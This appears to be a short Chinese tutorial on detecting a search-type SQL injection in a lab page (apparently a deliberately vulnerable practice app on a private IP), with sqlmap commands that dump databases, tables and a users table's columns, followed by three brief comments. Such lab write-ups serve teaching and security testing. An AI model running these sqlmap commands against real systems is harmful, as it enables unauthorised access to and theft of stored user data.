验证是否有注入
我们直接输入一个字符k
,点击搜索。
提示未见异常
我们输入关键字%k%
效果如下:
此时,我们可以得出,存在搜索型注入漏洞
攻击方式一
利用burp
抓包,将包中的文件另存为22.txt
将22.txt
放到sqlmap
根目录 /usr/share/sqlmap
爆出数据库
sqlmap -r "22.txt" --dbs
爆出表
sqlmap -r "22.txt" -D lou --tables
爆出表结构
sqlmap -r "22.txt" -D lou -T users --columns
方式二
不需要抓包保存文件的形式,直接执行命令
sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs
3 comments
评论表情测试!
来了来了
坐稳扶好